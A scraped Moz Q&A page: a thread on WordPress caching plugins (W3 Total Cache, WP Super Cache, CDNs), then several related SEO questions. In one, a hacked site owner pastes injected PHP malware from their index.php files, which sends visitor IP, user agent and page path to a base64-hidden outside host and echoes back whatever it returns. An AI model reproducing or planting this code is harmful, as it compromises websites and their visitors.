Loading websites faster
-
which are the best plugings for loading a website faster?
Wp smush it+ w3 total cache + having a good theme like thesis?
This plugin is good to have? or having w3 total cache is enough:
http://wordpress.org/plugins/db-cache-reloaded-fix/
thanks !
Best regards,
Sebastian Papp & His Team
-
Hi,
The two most popular cacheing plugins for WordPress are probably:
http://wordpress.org/plugins/wp-super-cache/
and the w3total cache one you mention.
Although they both have the same aim, the way they go about it is quite different. Depending on your technical knowledge you may find Super Cache easier to set up and manage than w3total.
For what it's worth I doubt you'll find a plugin that is better than these two, but you may benefit from experimenting with both to see which suits your host better.
I'd suggest that if either plugin working on a standalone basis is not making a difference, then you may have issues with your host that need addressing.
-
I prefer Total Cache with a CDN. How you setup Total Cache can also make a HUGE difference and it seems to depend somewhat on the server/host you're with. I usually setup the top two options then ONE of the next two (database or object caching). After that, hook into a CDN like CloudFlare and you should be screaming.
Check after each update you make in Pingdom Tools or Google Developer's Speed.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Linking Websites/ Plagiarized Content Ranking Above Original Content
Hey friends! Sooo this article was originally published in December 2016: https://www.realwealthnetwork.com/learn/best-places-to-buy-rental-property-2017/ It has been consistently ranking in positions 2-3 for long tail keyword "best places to buy rental property 2017" (and related keywords) since January-ish. It's been getting about 2000-2,500 unique views per week, until last week when it completely dropped off the internet (it's now ranking 51+). We just did a site redesign and changed some URL structures, but I created a redirect, so I don't understand why that would affect our ranking so much. Plus all of our other top pages have held their rankings -- in fact, our top organic article actually moved up from position 3 to 2 for much more competitive keywords (1031 exchange). What's even weirder is when I copy the sections of my article & paste into Google with quotes, our websites doesn't show up anywhere. Other websites that have plagiarized my article (some have included links back to the article, and some haven't) are ranking, but mine is nowhere to be found. Here are some examples: https://www.dawgsinc.com/rental-property-the-best-places-to-buy-in-the-year-2017/ http://b2blabs.com/2017/08/rental-property-the-best-places-to-buy-in-the-year-2017/ https://www.linkedin.com/pulse/best-places-buy-rental-property-year-2017-missy-lawwill/?trk=mp-reader-card http://news.sys-con.com/node/4136506 Is it possible that Google thinks my article is newer than the copycat articles, because of the new URL, and now I'm being flagged as spam? Does it think these are spam websites we've created to link back to our own content? Also, clearly my article is higher quality than the ranking articles. Why are they showing up? I double checked the redirect. It's good. The page is indexed... Ahhh what is going on?! Thanks for your help in advance!
White Hat / Black Hat SEO | | Jessica7110 -
Hosting Multiple Websites Within The Same Server Space
Hi, So, I have a client who wants to host two websites (which you could refer to as sister sites) on the same hosting account. For some reason, I was under the impression that doing as much may be detrimental (for SEO purposes). Am I correct in thinking this? Can I get some back-up documentation or comments here? I look forward to hearing what you all have to say. Thanks for reading!
White Hat / Black Hat SEO | | maxcarnage0 -
Moving website and domain name without 301 Redirect or rel=canonical
I do not wish to draw attention to my company, so I am using code names. For the sake of this discussion, we are a new car dealership representing Brand X Cars. The manufacturer of Brand X Cars pushes its dealers toward a website hosting company called CarWebsites in order to maintain a level of quality and control with each dealer. However, we have found the platform to be too restricting, and are switching to our own WordPress site. Unfortunately Brand X is claiming ownership of our original domain, BrandXCarDealer.net, so we have switched to BrandXCarDealer.com (which we prefer anyways). Now both websites are running, and there is duplicate content of everything. Brand X is not cooperative and will not 301 redirect to the new site, and we do not have access to the of the website for a rel=canonical. Brand X is also dragging its feet on shutting down BrandXCarDealer.net. We do still have access to change the content of the pages on the BrandXCarDealer.net site, but that is pretty much as far as our control goes. So my question is, is there anything we can do, without using a 301 redirect or rel=canonical, to tell Google to pay attention to the new BrandXCarDealer.com rather than the old BrandXCarDealer.net? Any suggestions are appreciated. Thanks!
White Hat / Black Hat SEO | | VanMaster0 -
Hreflang/Canonical Inquiry for Website with 29 different languages
Hello, So I have a website (www.example.com) that has 29 subdomains (es.example.com, vi.example.com, it.example.com, etc). Each subdomain has the exact same content for each page, completely translated in its respective language. I currently do not have any hreflang/canonical tags set up. I was recently told that this (below) is the correct way to set these tags up -For each subdomain (es.example.com/blah-blah for this example), I need to place the hreflang tag pointing to the page the subdomain is on (es.example.com/blah-blah), in addition to every other 28 subdomains that have that page (it.example.com/blah-blah, etc). In addition, I need to place a canonical tag pointing to the main www. version of the website. So I would have 29 hreflang tags, plus a canonical tag. When I brought this to a friends attention, he said that placing the canonical tag to the main www. version would cause the subdomains to drop out of the SERPs in their respective country search engines, which I obviously wouldn't want to do. I've tried to read articles about this, but I end up always hitting a wall and further confusing myself. Can anyone help? Thanks!
White Hat / Black Hat SEO | | juicyresults0 -
How to re-rank an established website with new content
I can't help but feel this is a somewhat untapped resource with a distinct lack of information.
White Hat / Black Hat SEO | | ChimplyWebGroup
There is a massive amount of information around on how to rank a new website, or techniques in order to increase SEO effectiveness, but to rank a whole new set of pages or indeed to 're-build' a site that may have suffered an algorithmic penalty is a harder nut to crack in terms of information and resources. To start I'll provide my situation; SuperTED is an entertainment directory SEO project.
It seems likely we may have suffered an algorithmic penalty at some point around Penguin 2.0 (May 22nd) as traffic dropped steadily since then, but wasn't too aggressive really. Then to coincide with the newest Panda 27 (According to Moz) in late September this year we decided it was time to re-assess tactics to keep in line with Google's guidelines over the two years. We've slowly built a natural link-profile over this time but it's likely thin content was also an issue. So beginning of September up to end of October we took these steps; Contacted webmasters (and unfortunately there was some 'paid' link-building before I arrived) to remove links 'Disavowed' the rest of the unnatural links that we couldn't have removed manually. Worked on pagespeed as per Google guidelines until we received high-scores in the majority of 'speed testing' tools (e.g WebPageTest) Redesigned the entire site with speed, simplicity and accessibility in mind. Htaccessed 'fancy' URLs to remove file extensions and simplify the link structure. Completely removed two or three pages that were quite clearly just trying to 'trick' Google. Think a large page of links that simply said 'Entertainers in London', 'Entertainers in Scotland', etc. 404'ed, asked for URL removal via WMT, thinking of 410'ing? Added new content and pages that seem to follow Google's guidelines as far as I can tell, e.g;
Main Category Page Sub-category Pages Started to build new links to our now 'content-driven' pages naturally by asking our members to link to us via their personal profiles. We offered a reward system internally for this so we've seen a fairly good turnout. Many other 'possible' ranking factors; such as adding Schema data, optimising for mobile devices as best we can, added a blog and began to blog original content, utilise and expand our social media reach, custom 404 pages, removed duplicate content, utilised Moz and much more. It's been a fairly exhaustive process but we were happy to do so to be within Google guidelines. Unfortunately, some of those link-wheel pages mentioned previously were the only pages driving organic traffic, so once we were rid of these traffic has dropped to not even 10% of what it was previously. Equally with the changes (htaccess) to the link structure and the creation of brand new pages, we've lost many of the pages that previously held Page Authority.
We've 301'ed those pages that have been 'replaced' with much better content and a different URL structure - http://www.superted.com/profiles.php/bands-musicians/wedding-bands to simply http://www.superted.com/profiles.php/wedding-bands, for example. Therefore, with the loss of the 'spammy' pages and the creation of brand new 'content-driven' pages, we've probably lost up to 75% of the old website, including those that were driving any traffic at all (even with potential thin-content algorithmic penalties). Because of the loss of entire pages, the changes of URLs and the rest discussed above, it's likely the site looks very new and probably very updated in a short period of time. What I need to work out is a campaign to drive traffic to the 'new' site.
We're naturally building links through our own customerbase, so they will likely be seen as quality, natural link-building.
Perhaps the sudden occurrence of a large amount of 404's and 'lost' pages are affecting us?
Perhaps we're yet to really be indexed properly, but it has been almost a month since most of the changes are made and we'd often be re-indexed 3 or 4 times a week previous to the changes.
Our events page is the only one without the new design left to update, could this be affecting us? It potentially may look like two sites in one.
Perhaps we need to wait until the next Google 'link' update to feel the benefits of our link audit.
Perhaps simply getting rid of many of the 'spammy' links has done us no favours - I should point out we've never been issued with a manual penalty. Was I perhaps too hasty in following the rules? Would appreciate some professional opinion or from anyone who may have experience with a similar process before. It does seem fairly odd that following guidelines and general white-hat SEO advice could cripple a domain, especially one with age (10 years+ the domain has been established) and relatively good domain authority within the industry. Many, many thanks in advance. Ryan.0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Need help please with website ranking problem!
I am currently struggling with our site www.discountbannerprinting.co.uk to rank our PVC banners page http://www.discountbannerprinting.co.uk/banners/vinyl-pvc-banners.html On the UK search I have the following positions. hfe-signs.co.uk/banners.php
White Hat / Black Hat SEO | | BobAnderson
signfirm.com/banners.html
bigvaluebanners.co.uk/PVC_Banners_High_Quality_Cheap_Outdoor_PVC_Mesh_Full_Colour_Banner/
bannerprintingandroid.co.uk/pvc-banners/
printedbannersandsigns.co.uk/
your-print.co.uk/pvc-banners-special.html
bannerbuzz.co.uk/pvc-banners
bannerbuzz.co.uk/
auraprint.co.uk/products/banners/
vinylprinting.co.uk/pvc_banners.html
banners.co.uk/CustomBanners-BlankBanners.htm
use - http://www.discountbannerprinting.co.uk/banners/vinyl-pvc-banners.html I can't decide if it is url structure of the site, to many links on the left hand nav diluting power, keywords, etc but it does not look right that we are so far down, at least 2 of the pages above us have no content at all and some have no links or social either. Any help would be appreciated.0 -
What happens when content on your website (and blog) is an exact match to multiple sites?
In general, I understand that having duplicate content on your website is a bad thing. But I see a lot of small businesses (specifically dentists in this example) who hire the same company to provide content to their site. They end up with the EXACT same content as other dentists. Here is a good example: http://www.hodnettortho.com/blog/2013/02/valentine’s-day-and-your-teeth-2/ http://www.braces2000.com/blog/2013/02/valentine’s-day-and-your-teeth-2/ http://www.gentledentalak.com/blog/2013/02/valentine’s-day-and-your-teeth/ If you google the title of that blog article you find tons of the same article all over the place. So, overall, doesn't this make the content on these blogs irrelevant? Does this hurt the SEO on these sites at all? What is the value of having completely unique content on your site/blog vs having duplicate content like this?
White Hat / Black Hat SEO | | MorganPorter0